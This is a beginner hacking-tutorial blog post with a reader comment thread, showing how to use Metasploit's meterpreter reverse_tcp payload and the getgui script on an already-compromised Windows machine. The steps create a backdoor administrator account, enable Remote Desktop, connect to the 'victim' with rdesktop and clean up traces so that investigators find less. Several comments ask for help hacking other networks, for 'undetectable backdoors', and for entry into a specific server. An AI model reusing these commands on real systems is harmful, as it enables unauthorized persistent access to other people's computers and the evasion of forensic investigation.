• 8,281
  • 91
  • +474
  • 568
5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Bookmark

Type : Tutorial

Level : Beginner, Medium

Last year when I'm teaching about computer security class, one student come and ask "can you give me simple tutorial how to use command prompt?", then I say "I don't think so it will be do in a short course because learning about command prompt you should practice everyday for first times and make it familiar like your mother tongue" from this situation I know that not every people know about command prompt or something related to console based. How about hacking?yep it's the same…sometimes newly learned they just follow tutorials, but didn't know what exactly they doing.

Today I will write simple tutorial how to enable Remote Desktop(use Remote Desktop Protocol on TCP port 3389) when you've already inside remote system using Metasploit Framework. This method should be useful if you have limitation how to use command prompt. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirement :

1. Metasploit Framework

2. Backtrack 5(or another linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter :

1. My favourite meterpreter is using reverse_tcp. If you also like to use reverse_tcp for your payload, you can use like the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

to view the help.

3. To add a user with username : valent and password : r4h45i4 and then enable the Remote Desktop Service

run getgui -u valent -p r4h45i4

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Yep we already successfully created the user and activated the Remote Desktop Service.

Please note the last command "For cleanup use command : run multi_console_command….bla…bla….bla" it will be used after finish using the Remote Desktop Service of victim computer.

4. To connect to victim using remote desktop, we can use rdesktop program (it's already installed on backtrack).

rdesktop -u <username>  -p <password> <ip-address-target>

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

initializing……and then….

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

5. You also should remember that when you add user it's mean that you are adding one new user on remote computer. Be wise to use this methods, because when you do much changes, you also will left a lot of changes on remote computer and it can be tracked by investigators :-) . To clean up the user we've already created before(you can see on step 3).

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Finish…

hope it's useful for you…any question?just drop on comment box. :-)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

50 Responsesto “5 Steps to Enable Remote Desktop Using Metasploit Meterpreter”

  1. Hagai says:

    Hi,
    I have a bigginers Q. :)
    where do I find the Meterpreter in BT5?

  2. puppet says:

    how do we know the username n password of the victim???
    n do we need to add new user to the victim compter?

    • v4L says:

      #puppet
      First of all, you should find a vulnerable target…and then try to compromise it…when you successfully compromise target, you didn’t need to input any password or username :-)

  3. mehdi says:

    i have a probleme Unknown command: rdesktop

  4. th3bAdh says:

    i have problem with rdesktop, password was invalid, but i've double check password, but still gettin error

  5. vir0e5 says:

    Thx for info….
    Download RDesktop
    http://garr.dl.sourceforge.net/sourceforge/rdesktop/rdesktop-1.6.0.tar.gz

  6. josh says:

    I am using following payload:
     (windows/shell/reverse_tcp):
    but wen i run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me ….msf  exploit(ms03_026_dcom) > 
    so nothing happens…..you know what could be the possible reason for this?
    Thanks!
     
     

  7. bagus says:

    when i write getgui – h run , run the command it says unokwon ..
    What should I do ?

  8. DeusIgni says:

    Whenever I attempt to create a shell in target computer, the handler is created on my end, but the connection times out. Why is that? Is it error on my end?
    -DeusIgni

    • v4L says:

      #Deuslgni
      Hmm maybe the target prevent you to create it…doesn’t mean that if you got meterpreater,you’ll also got the shell…it’s depend with the vulnerability ranking…fyi the target machine in this tutorial was XP SP0..

  9. DeusIgni says:

    Is there a way to use this exploit on XP SP3?
    -DeusIgni

  10. boby says:

    hi
    i am using bt5 r2 in vmware.i am trying to remotely  control my win 7 desktop.when meterpreter session -i 1 is started like
    meterpreter>
    when i enter the shell,pwd or cd command it give me error of unknoun command
    what will i do??

    • v4L says:

      #boby
      maybe the rating of exploit you use not an excellent one. btw if you want to try and make sure it work you can view this tutorial http://www./hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

  11. boby says:

    I m using windows/meterpreter/reverse_tcp,i have same problem.I have tried java_signed_applet i still have this problem " unknown command ".when i was using backtrack 5 r1 it was working very well
    Is there any installation problem or may have some bugs in backtrack 5 r2???

  12. boby says:

    metertreter>pwd
    pwd unknoun command
    same problem

    • v4L says:

      #boby
      Hmmm….maybe you can try to update your metasploit framework first by using msfupdate command.

      • boby says:

        Thank you very mush for your reply… :)

        which tool of backtrack 5 must be update after installation??and which command i have to use???

        i am using these commands
        for msf
        =======
        1,msfupdate
        for library
        ===========
        2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

        which command you have suggested me to update backtrack 5 R1 or Backtrack 5 R2 for better performance?

        • v4L says:

          #boby
          btw I didn’t know the exact thing from your problem and how you install your BT. maybe you also can try to update your system using apt-get update and apt-get upgrade.

  13. boby says:

    my problem is solve.Thanks for your help

  14. deff says:

    what is stupidity, provide a metasploit payload when you just need to add user to a group and start a service from shell. I understand the reason you provide it but would be a lot more usefull to actually explain it than just provide script kiddies…

    • v4L says:

      #deff
      LoL…maybe what you mean is http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
      if you think like that, so why you didn’t contribute to wrote an “awesome tutorial” here? or maybe you give your own tutorial link…don’t just say and criticize without action :-P it’s just wasting your time… :-)
      ps : next time it’s better use your real e-mail not the fake one :-)
      merci monsieur

  15. Puka says:

    I have metasploit 4.4 gui comunity edition but no change to exploit. btw i have windows 7 sp1

  16. anonymous says:

    i hv installed backtrack on vmware and hack my windows 7 system with the system intenal ip but how i can set my dynamic ip to hack computer remotely

  17. Samuel says:

    Hi, when i tried to do the rdesktop -u ( ) -p ( ) and the ipaddress and pressed enter it says Autoselected keyboard map en-us and does not do anything…do you know why that happens?

    • v4L says:

      #samuel
      hmm…maybe your remote desktop service on victim PC haven’t started yet..
      maybe you can take a look to this tutorial : http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/

  18. Thirteen says:

    Thanks for your time and effort to provide tutorials!

  19. boby says:

    hi

    please giive me a toturial to hack pc on other network.please guide me

  20. Remaro says:

    Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?

  21. Josh says:

    after executing this command :
    run getgui -u testuser -p testpass

    show me this message :
    This version of Meterpreter is not supported with this Script!

    what’s the problem?

  22. boby says:

    Hi,

    I want download vanish.sh and crypter.ph for backtrack 5 r3,I search it on google but I cannot find it.kindly give me these undectable backdoors or download link.I will be very thankful to you

  23. fahmi says:

    after I type set payload windows/meterpreter/reverse_tcp the meterpreter won’t to show up, why? thanks

  24. intoxicate says:

    Hey, I’ve tried to use getgui through meterpreter but apparently it doesn’t add user to the remote machine. To prove this, I get on my remote host and run net command to see if any user has been added to administrator local group. But none of user has been added to that group. Since it doesn’t add a user to remote host, I cannot login via rdesktop. I’m not sure if the script is not working properly or I did something wrong.

  25. sheaz says:

    Dear

    v4L i want to hack a server its ip is 203.128.26.xxx and remote desktop is already on. i am new in this field. please only make user in this server and please give me user name and password i am very thankful to you.

  26. akbar says:

    I am a student from Iran ..
    thanks for your this tutorial ….!

  27. GuestMan says:

    It is work when victim has linux?

Leave a Reply

Your email address will not be published. Required fields are marked *